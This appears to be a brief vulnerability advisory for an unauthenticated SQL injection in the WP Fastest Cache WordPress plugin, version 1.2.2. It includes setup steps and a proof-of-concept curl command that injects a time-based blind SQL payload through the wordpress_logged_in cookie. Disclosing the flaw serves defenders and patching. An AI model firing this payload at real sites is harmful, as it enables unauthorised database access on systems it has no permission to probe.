Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
1. Visit WP Fastest Cache > Settings. Ensure “Cache System” is enabled, and “Logged-in Users” is disabled. Click “Submit” at the bottom. 2. The following curl command demonstrates the SQLi: curl https://example.com -H “Cookie: wordpress_logged_in=1234%22%20AND%20(SELECT%202537%20FROM%20(SELECT(SLEEP(5)))Sazm)%20AND%20%22qzts%22=%22qzts”
CPE | Name | Operator | Version |
---|---|---|---|
eq | 1.2.2 |